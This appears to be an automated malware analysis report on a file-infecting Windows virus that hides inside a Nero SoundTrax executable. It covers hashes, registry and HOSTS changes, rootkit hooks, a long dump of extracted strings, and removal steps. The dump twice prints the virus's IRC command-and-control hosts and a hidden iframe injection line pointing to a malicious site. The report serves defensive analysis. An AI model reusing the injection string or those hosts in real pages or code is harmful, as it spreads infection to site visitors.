MD5: 73f3fd7f3eeb2b135074e0d7ecdc693d
SHA1: 1955bd018c6fbeff9cf09fa6502af8b14acfac30
SHA256: b1812a505078c13a4a52b640aadb5b14a10a0763d3637d33cb7c0388a4fac1c9
SSDeep: 49152:o34h4Hit9abab6uO7nMxXhittBQKDaPx:HaCt9wab6uMewQtx
Size: 1970264 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2006-07-19 20:57:24
Analyzed on: WindowsXP SP3 32-bit

Summary:

Virus. A program that recursively replicates a possibly evolved copy of itself.

Payload

No specific payload has been found.

Process activity

The Virus creates the following process(es):
No processes have been created.
The Virus injects its code into the following process(es):

%original file name%.exe:632

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

No files have been created.

Registry activity

The process %original file name%.exe:632 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 CF F5 5E CC 3F F3 99 F7 34 F2 A1 54 12 56 4F"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

The Virus modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 734 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

The Virus installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtCreateProcessEx
NtCreateProcess
NtCreateFile

Propagation

VersionInfo

Company Name: Nero AG
Product Name: Nero SoundTrax
Product Version: 1, 0, 0, 57
Legal Copyright: Copyright (c) 2003-2005 Nero AG and its licensors
Legal Trademarks: Nero SoundTrax
Original Filename: SoundTrax.exe
Internal Name: Nero SoundTrax
File Version: 1, 0, 0, 57
File Description: Nero SoundTrax
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Virus connects to the servers at the folowing location(s):

.text

`.rdata

.data

.rsrc

tcSSSh

SSSh(ZM

t!SSSShP

SSSSh@

.tTPV

FTPjK

FtPj;

F.PjRWj

u.WWj

u.VVj

u$SShe

@u.Wj

G.UPj

SSSh$sM

CLSID\{436F4AD7-C95B-4d2f-B0F8-8DC643F7A200}

CHotKeyCtrl

msctls_hotkey32

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

%*.*f

GDI32.DLL

{X-X-X-XX-XXXXXX}

MSWHEEL_ROLLMSG

File%d

windows

CNotSupportedException

CTL3D32.DLL

MSH_SCROLL_LINES_MSG

ddeexec

%s\ShellNew

%s\DefaultIcon

%s\shell\printto\%s

%s\shell\print\%s

%s\shell\open\%s

ole32.dll

__MSVCRT_HEAP_SELECT

user32.dll

portuguese-brazilian

ADVAPI32.dll

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

RegCreateKeyA

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyA

RegEnumKeyA

SHFOLDER.dll

WINMM.dll

VERSION.dll

GetWindowsDirectoryA

WinExec

GetCPInfo

KERNEL32.dll

GetKeyState

EnumChildWindows

UnhookWindowsHookEx

SetWindowsHookExA

MsgWaitForMultipleObjects

GetAsyncKeyState

CreateDialogIndirectParamA

USER32.dll

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

GDI32.dll

comdlg32.dll

WINSPOOL.DRV

ShellExecuteA

SHELL32.dll

COMCTL32.dll

oledlg.dll

OLEPRO32.DLL

OLEAUT32.dll

SHDeleteKeyA

SHLWAPI.dll

Nero.txt

\track%d.wav

Server%d

/%s%d%s

DefExportFormat

%.2f %s

PlaylistImport

NWE.CMainFrm.PostCreate

ShowCmd

LastWindowState

nero.exe

Software\Microsoft\Windows\CurrentVersion\App Path

%s|*%s||

NewTake%d.wav

%d:d

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\NCoverEd.exe

nero.cdc

\NeroAPI.dll

NeroImportIsoTrack

NeroImportIsoTrackEx

NeroImportDataTrack

%d %s

%d%s %.2d%s

%d %.3d %.3d %.3d

%d %.3d %.3d

%d %.3d

%d%s %.2d%s:%.3d

%d - %s

%x-%x-%x-%x

ID:0x%lX Cmd: 0x%X

Hilfe-Symbol-Name: %s

Res-Symbol-Name: %s

%d.%d.%d.%d

.PAVCResourceException@@

..\..\NERO\hlp\Nero.hm

KERNEL32.DLL

shdocvw.dll

Portuguese(Brazil)

Portuguese (Brazil)

SUBLANG_PORTUGUESE_BRAZILIAN

Portuguese

SUBLANG_PORTUGUESE

LANG_PORTUGUESE

*.hlp

*.chm

eng.hlp

eng.chm

Requested:%d

Present:%d

UniTranslator dictionary file 1.0.0.1

UniTranslator dictionary file 1.0.0.0

NeASL.dll

\winhlp32.exe

There was not enough memory to complete the operation.

The operating system denied

The .EXE file is invalid

(non-Win32 .EXE or error in .EXE image).

The operating system is out

Serial6_%d
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SetSecurityDescriptorDacl Error %u
InitializeSecurityDescriptor Error %u
LocalAlloc Error %u
SetEntriesInAcl Error %u
AllocateAndInitializeSid Error %u
Windows Media Player
NeroDigitalPro!UninstallKey
NeroMultiMounter!UninstallKey
NeroMediaHome!UninstallKey
SIPPSTAR-PBX!UninstallKey
NeroBackItUp!UninstallKey
NeroRecode!UninstallKey
NeroShowTime!UninstallKey
NeroNet!UninstallKey
NMIX!UninstallKey
NMPUninstallKey
InCD!UninstallKey
Nero - Burning Rom!UninstallKey
NeroVision!UninstallKey
SIPPS!UninstallKey
SpecialOffer.exe
mp3PRO.dll
NeroDigitalExt.dll
NeroBurnPlugin.dll
NeVCD.ax
NeNDMux.ax
NDParser.ax
NeroBurnRights.exe
NeAudioConv.ax
NeDVD.ax
Neroshx.dll
PackageCreator.exe
DiscAgent.exe
PhotoSnapViewer.exe
PhotoSnap.exe
DMAManager.exe
AdvrCntr.dll
SetupX.exe
Setup.exe
BurnSupportDisc.exe
NeroDigitalVideoEncoder.ax
NeroDigitalAudioEncoder.ax
NeNDAud.ax
Aac.dll
NeroMediaCon.dll
NeVCR.dll
NeVCR.ax
NeRecode.dll
NeACenc.dll
NeAudio.ax
NeNDVid.ax
NeMPG.ax
NeVideo.ax
ShortCut.dll
TestNeroLicense.exe
NeroStartSmart.exe
InfoTool.exe
DriveSpeed.exe
CDSpeed.exe
ImageDrive.exe
SoundTrax.exe
CentralAMSvc.exe
GatewaySvc.exe
RTPProxySvc.exe
wizardui.exe
configui.exe
sip_proxySvc.exe
phone.exe
BackItUp.exe
NeroNET.exe
NeroMediaPlayer.exe
CoverDes.exe
WaveEdit.exe
InCDL.exe
InCD.exe
nnservicectrl.exe
NMSTranscoder.exe
NeroMediaHome.exe
moviemk.exe
WINWORD.EXE
POWERPNT.EXE
OUTLOOK.EXE
EXCEL.EXE
wmplayer.exe
NeNDConv.exe
Nero.exe
Recode.exe
NeroVision.exe
ShowTime.exe
NeroMix.exe
NLDBV$Revision: 1.18.2.65 $
CLSID\{4EC0690F-EA6F-4573-845F-782AD19F35DB}\InprocServer32
LicenseKey
CLSID\{C46FF1FF-78EF-4939-8B00-46273B7B8EE1}\InprocServer32
Burlywood
#XXX
\VMPEG2Enc.dll
\DVDMPEG2Enc.dll
\..\Shared\AudioPlugins\aacmp32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\nero.exe
\aacmp32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\NeroMediaPlayer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Nero.exe
NeMP3Enc.dll
6, 6, 0, 13
HMPITM.exe
ddddd
NeRSDB.dll
GetASPI32SupportInfo
WNASPI32.DLL
SetupAPI.dll
.?AVCCmdTarget@@
.?AVCHotKeyCtrl@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCArchiveException@@
.PAVCObject@@
.PAVCSimpleException@@
.?AVCStatusCmdUI@@
.?AVCToolCmdUI@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCFileException@@
.PAVCOleDispatchException@@
.PAVCOleException@@
zcÁ
c:\%original file name%.exe
[[[^^^```}}}
&&~%%{$/
.SHtR7
4441444
444\4443444
G..cmQQ
444\444!
444]444!
O..WkHH
444]444"
.dd\WMJ
.MMM00,
.MM00.
.JJ0.
444_4448444
444`4447444
444_4443444
4443444
=..|444&
4448444
?@-cfH}}X
gM5hI4R<(Q3#TB-W>.aC2XA1
eB"uN.jK-|U:P,
U0]7 mL-pI.pM0K.
a?gA#^<%dG(pH-hA*U7
K6#aG/^G.cC-T7"8)
eC.zT:xiJ
oUxXBoE.waC
nj.lT/H4
rA.rF0
tqQg8%sZ<
YA%S5
slOwE.aF,fZ>
t]=Ê)
nB-uF.cO2D5#0=`
{\eF.cI1
uK1mF.WD.?/
ztU=\<%s]A
o9#kD.UE.
{pdK/sS;qX>iN5sV=oO6iL5kN7mM5[D,x[BhK0_C)eJ0dH.dI**
rP.mB
aP0~fHoS=mH.qV:lK4j\:
zE.jS5
dD.pD,~]?6
K9$mP%s[$aB1~pQ
gItS6tX7z_>rR7tY:yV:jL4fI.rM1k3
bG.hL3qT;sY@hM4iK5lT6mO6gJ2rT5jL2gL0[D&
_A'_B%uV9oT7iM/oR5mW7nV9gN-kM1r\;pN3d'
bK {eDoH.kL0}
zI)}K uL-zQ.vP/|V3
~eJcJ.pX;nP7pR9pY:iS8qY:pX9kT7pS:lU4mS7nP4iP5eN2hL3jR6mU8iO3gL3gL2lL4hN5kQ6hJ1I2
nbD3nI.xW<
~_8(!< ".!
jU7xL.lN6
{dM5xK.rV:
hjj3zx>dZ0aN.mN1nE*xD b2 k;
1d%U~<~VP
es}EmxB`b7[K3`J.nY0aN!gR.dF V9
NKS(UN.YN-\M*VB
List of audio files to import. Click an audio file to highlight it.
Select the default file format that should be used when exporting audio files from SoundTrax.
Enter the directory where the exported tracks should be saved.
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
ADVAPI32.DLL
\RUNDLL32.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
irc.zief.pl
proxim.ircgalaxy.pl
NICK kefqbevr
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
?.chuu
windowsupdate
drweb
1, 0, 0, 57
{E6674EE4-57B1-42F2-A953-43705B992AD5}
{8352EDFE-28C3-4012-90BC-43B0AF7B7E57}
Default export file format:
Audio files to import:
{A8DC3A14-CBFC-4BE8-995D-2FDB6C7AA9F2}
{3CEC18D8-3C79-4570-82E6-81D54AB300C3}
{A7F78220-7648-4826-837B-6001E2AD7824}
Export CD Tracks to Audio Files
Export CD Tracks to Audio Files...
&Export to Audio File...
About %s
Version: %s
Name: %s
Company: %s
http://www.microsoft.com/windows/ie
Nero SoundTrax Project Files (*.npf)
SoundTrax.Project
Duration of object: %sTNero SoundTrax could not find any audio file filter plug-ins. Please reinstall Nero..Wave Files (*.wav)|*.wav|All Files (*.*)|*.*||
%d minutes
Transport Bar
%d hours
Track %d!Could not measure tempo of clips.TNero SoundTrax could not find any audio file filter plug-ins. Please reinstall Nero.&%s (Volume label: %s, File system: %s);An error occurred while trying to open the Nero Wave Editor
Unable to create file %s.
Track %d
Ready%Select an object on which to get Help
Help
Assignable Effect Group %dJThe selected item is not an assignable effect group and cannot be removed.
FX G%d!The two clips have the same tempo
Exporting
, %d%% done4NeroAPI was not able to open the selected CD device.
CD Track %d!There is no CD-RW in the recorder
CD Index %d,The selected recorder does not support CD-RW
%dx (%d KB per second)?The inserted CD-RW is not empty. Do you wish to erase the disc?%An error occurred while importing %s.MUnable to open the file %s which is referenced by the Nero SoundTrax project.
Burn CD.Change property settings of the selected track
%d:%.1d:%.3d
Track %d of %d
(fixed speed)IPlease insert a CDR or just click OK if you are using the Image Recorder./Image Files (*.nrg)|*.nrg|All Files (*.*)|*.*||
Use a linear crossfade function%Use an exponential crossfade function$Use a logarithmic crossfade function#Use a sinusoidal crossfade function
Pan (in %)4An error occurred while trying to access the NeroAPI1No compatible recorders were found on this system*Playlist File (*.pls; *.m3u)|*.pls;*.m3u||
All Files (*.*)|*.*|&Volume Slider (range -40 dB to  12 dB)/Pan Slider (range -100% = left to 100% = right)(Track Level Meter (range -60 dB to 0 dB)
Vol: %d dB
Pan: %d %%
Step %d of %d:
Grid line at each 8th triplet9Opens the effect chain editor for the master effect chain.The file is not a Nero SoundTrax project file.
Effect Files (*.eff)
EffectBrowser.Document
%d BPM
Creating peak file, %d%% done.
Play Looped
VThis operation will remove the content of the current project. Do you want to proceed?
Version %d.%d.%d.%d
Insert Audio File(s)ZThis operation deletes the track and its entire content. Are you sure you want to proceed?
Title: %s, Artist: %s
There are too many CD tracks in the project. The Audio CD standard does not support more than 98 CD tracks. Some CD tracks were truncated
Select the maximum noise level in pauses between tracks and the minimum length of pauses and tracks. Click "Detect" to scan the recording with new settings.vSet the length of the pause between tracks or the length of the overlap if you want tracks crossfaded into each other.lAdjust the level of noise reduction to what you find optimal. You can hear the result by clicking "preview".
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
#Unable to load mail system support.
%The help file cannot be opened: %1!s! No Help topic is associated with this item.PThe license you are currently using does not allow you to start this application
This version of the application cannot be run in this language. Please visit our Web site at www.nero.com to purchase an unlimited serial number.
Visit our support pages for more information about manuals and help files.

%original file name%.exe_632_rwx_005C8000_00005000:


ADVAPI32.DLL
\RUNDLL32.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
irc.zief.pl
proxim.ircgalaxy.pl
NICK kefqbevr
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
?.chuu
KERNEL32.DLL
windowsupdate
drweb

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
3. Delete the original Virus file.
   
4. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.